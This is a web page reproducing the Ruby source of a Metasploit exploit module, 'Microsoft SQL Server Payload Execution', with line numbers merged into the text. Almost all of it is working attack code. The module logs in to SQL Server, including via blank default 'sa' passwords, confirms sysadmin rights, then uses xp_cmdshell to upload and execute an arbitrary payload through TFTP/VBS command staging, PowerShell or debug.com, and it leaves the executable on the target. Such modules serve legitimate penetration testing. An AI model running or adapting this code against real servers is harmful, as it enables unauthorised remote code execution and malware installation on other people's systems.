Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/mssql/mssql_payload.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::MSSQL9include Msf::Exploit::CmdStager10include Msf::OptionalSession::MSSQL11#include Msf::Exploit::CmdStagerDebugAsm12#include Msf::Exploit::CmdStagerDebugWrite13#include Msf::Exploit::CmdStagerTFTP1415def initialize(info = {})16super(update_info(info,17'Name' => 'Microsoft SQL Server Payload Execution',18'Description' => %q{19This module executes an arbitrary payload on a Microsoft SQL Server by using20the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.2122First, the original method uses Windows 'debug.com'. File size restrictions are23avoided by incorporating the debug bypass method presented by SecureStat at24Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.2526A second method takes advantage of the Command Stager subsystem. This allows using27various techniques, such as using a TFTP server, to send the executable. By default28the Command Stager uses 'wcsript.exe' to generate the executable on the target.2930Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the31payload on the target.3233NOTE: This module will leave a payload executable on the target system when the34attack is finished.35},36'Author' =>37[38'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method39'jduck' # command stager mods40],41'License' => MSF_LICENSE,42'References' =>43[44# 'sa' password in logs45[ 'CVE', '2000-0402' ],46[ 'OSVDB', '557' ],47[ 'BID', '1281' ],4849# blank default 'sa' password50[ 'CVE', '2000-1209' ],51[ 'OSVDB', '15757' ],52[ 'BID', '4797' ]53],54'Platform' => 'win',55'Arch' => [ ARCH_X86, ARCH_X64 ],56'Targets' =>57[58[ 'Automatic', { } ],59],60'CmdStagerFlavor' => 'vbs',61'DefaultTarget' => 0,62'DisclosureDate' => '2000-05-30'63))64register_options(65[66OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])67])68end6970def check71if session72set_mssql_session(session.client)73end7475unless session || mssql_login_datastore76vprint_status("Invalid SQL Server credentials")77return Exploit::CheckCode::Detected78end7980mssql_query("select @@version", true)81if mssql_is_sysadmin82vprint_good "User #{datastore['USERNAME']} is a sysadmin"83Exploit::CheckCode::Vulnerable84else85Exploit::CheckCode::Safe86end87ensure88disconnect89end9091# This is method required for the CmdStager to work...92def execute_command(cmd, opts)93mssql_xpcmdshell(cmd, datastore['VERBOSE'])94end9596def exploit97if session98set_session(session.client)99else100unless mssql_login_datastore101print_status("Invalid SQL Server credentials")102return103end104end105106method = datastore['METHOD'].downcase107108if (method =~ /^cmd/)109tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']110execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })111else112# Generate the EXE, this is the same no matter what delivery mechanism we use113exe = generate_payload_exe114115# Use powershell method for payload delivery if specified116if (method =~ /^ps/) or (method =~ /^power/)117powershell_upload_exec(exe)118else119# Otherwise, fall back to the old way..120mssql_upload_exec(exe, datastore['VERBOSE'])121end122end123124handler125disconnect126end127end128129130